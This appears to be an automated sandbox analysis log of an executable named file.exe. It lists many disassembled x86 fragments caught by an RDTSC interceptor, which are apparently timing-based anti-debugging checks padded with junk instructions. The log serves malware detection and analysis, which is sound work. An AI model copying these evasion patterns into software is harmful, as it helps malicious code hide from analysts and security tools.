                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC00C5 second address: 4DC011E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F927881D80Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007F927881D811h 0x00000018 pushfd 0x00000019 jmp 00007F927881D810h 0x0000001e sbb ah, FFFFFFF8h 0x00000021 jmp 00007F927881D80Bh 0x00000026 popfd 0x00000027 pop esi 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC011E second address: 4DC012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC012B second address: 4DC014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D814h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC014B second address: 4DC014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC014F second address: 4DC0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0CB6 second address: 4DA0CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE282Fh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0CC9 second address: 4DA0D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F927881D814h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov bx, ax 0x00000013 mov ebx, ecx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F927881D814h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D0B second address: 4DA0D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D0F second address: 4DA0D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D15 second address: 4DA0D1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0459 second address: 4DF04A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F927881D80Fh 0x00000009 and ax, 9B9Eh 0x0000000e jmp 00007F927881D819h 0x00000013 popfd 0x00000014 call 00007F927881D810h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov di, ax 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF04A6 second address: 4DF04B9 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 mov ecx, ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF04B9 second address: 4DF04DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 call 00007F927881D810h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF04DC second address: 4DF04E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF04E0 second address: 4DF04E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80174 second address: 4D8019A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9278BE282Dh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8019A second address: 4D801B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D811h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D801B6 second address: 4D801CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop ecx 0x00000010 mov edi, 579BE08Ah 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D801CC second address: 4D801E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D817h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8022B second address: 4D8022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8022F second address: 4D80235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA09ED second address: 4DA0A01 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 5A79A209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 push edx 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05CE second address: 4DA05D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04E5 second address: 4DA04E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04E9 second address: 4DA0564 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F927881D816h 0x00000008 jmp 00007F927881D815h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov ah, FCh 0x00000016 mov ebx, 48DF627Ah 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007F927881D80Bh 0x00000022 add eax, 2D337E1Eh 0x00000028 jmp 00007F927881D819h 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F927881D80Dh 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0280 second address: 4DA0294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE2830h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0294 second address: 4DA0298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB00F7 second address: 4DB00FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB00FD second address: 4DB0123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 0Ah 0x00000005 mov di, 833Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F927881D817h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0123 second address: 4DB015C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9278BE282Fh 0x00000008 pop eax 0x00000009 call 00007F9278BE2839h 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB015C second address: 4DB0174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D814h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0174 second address: 4DB01A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F9278BE2836h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB01A2 second address: 4DB01A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB01A6 second address: 4DB01AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF03DE second address: 4DF03E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF03E4 second address: 4DF042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov edi, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F9278BE2838h 0x00000016 jmp 00007F9278BE2835h 0x0000001b popfd 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0444 second address: 4DC0461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D819h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0461 second address: 4DC0467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0467 second address: 4DC046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC046B second address: 4DC04AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b jmp 00007F9278BE282Fh 0x00000010 and dword ptr [eax], 00000000h 0x00000013 jmp 00007F9278BE2836h 0x00000018 and dword ptr [eax+04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov si, di 0x00000022 mov ebx, 62EE6F0Ch 0x00000027 popad 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC04AE second address: 4DC04C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D811h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0423 second address: 4DA0484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9278BE2836h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F9278BE2830h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov esi, 0976128Dh 0x0000001c mov ah, 4Ah 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov esi, 7C5DB8FDh 0x00000028 pushfd 0x00000029 jmp 00007F9278BE282Ah 0x0000002e and cx, A5D8h 0x00000033 jmp 00007F9278BE282Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0054 second address: 4DC0058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0058 second address: 4DC005C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC005C second address: 4DC0062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0062 second address: 4DC006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 9C51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0279 second address: 4DC02AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D819h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 jmp 00007F927881D80Fh 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC02AD second address: 4DC02C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE2834h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC02C5 second address: 4DC0314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F927881D816h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F927881D810h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F927881D80Dh 0x00000021 mov di, si 0x00000024 popad 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0314 second address: 4DC0319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0773 second address: 4DE077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 1E7Fh 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE077C second address: 4DE07A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9278BE282Dh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE07A5 second address: 4DE07F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F927881D816h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F927881D810h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a jmp 00007F927881D80Dh 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F927881D80Dh 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE07F9 second address: 4DE07FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE07FF second address: 4DE0803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0803 second address: 4DE0807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0807 second address: 4DE0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D815h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0827 second address: 4DE082D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE082D second address: 4DE0878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d popad 0x0000000e mov eax, dword ptr [778165FCh] 0x00000013 jmp 00007F927881D80Ch 0x00000018 test eax, eax 0x0000001a jmp 00007F927881D810h 0x0000001f je 00007F92EB1D0900h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0878 second address: 4DE0895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0895 second address: 4DE08EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D811h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c movzx ecx, di 0x0000000f mov ax, di 0x00000012 popad 0x00000013 xor eax, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edi 0x0000001a pop esi 0x0000001b pushfd 0x0000001c jmp 00007F927881D819h 0x00000021 adc si, AF86h 0x00000026 jmp 00007F927881D811h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE08EE second address: 4DE08F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE08F4 second address: 4DE08F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE09F1 second address: 4DE09F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE09F7 second address: 4DE09FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE09FB second address: 4DE0A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ret 0x0000000c nop 0x0000000d push eax 0x0000000e call 00007F927CFA3245h 0x00000013 mov edi, edi 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9278BE282Eh 0x0000001c add ax, 5DF8h 0x00000021 jmp 00007F9278BE282Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F9278BE2838h 0x0000002d adc al, 00000058h 0x00000030 jmp 00007F9278BE282Bh 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F9278BE2830h 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0A77 second address: 4DE0A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0A7D second address: 4DE0AD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 push eax 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9278BE282Bh 0x00000012 sub si, 347Eh 0x00000017 jmp 00007F9278BE2839h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F9278BE2838h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0AD0 second address: 4DE0AF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F927881D815h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0AF8 second address: 4DE0AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0AFE second address: 4DE0B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9003C second address: 4D90060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9278BE282Ch 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90060 second address: 4D90066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90066 second address: 4D9006A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9006A second address: 4D90089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D814h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90089 second address: 4D90150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F9278BE2836h 0x00000010 and esp, FFFFFFF8h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F9278BE282Eh 0x0000001a add ecx, 4977F118h 0x00000020 jmp 00007F9278BE282Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F9278BE2838h 0x0000002c adc cl, 00000078h 0x0000002f jmp 00007F9278BE282Bh 0x00000034 popfd 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007F9278BE2836h 0x0000003c push eax 0x0000003d jmp 00007F9278BE282Bh 0x00000042 xchg eax, ecx 0x00000043 jmp 00007F9278BE2836h 0x00000048 xchg eax, ebx 0x00000049 jmp 00007F9278BE2830h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90150 second address: 4D90154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90154 second address: 4D9015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9015A second address: 4D90160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90160 second address: 4D9017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9017E second address: 4D90182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90182 second address: 4D90195 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
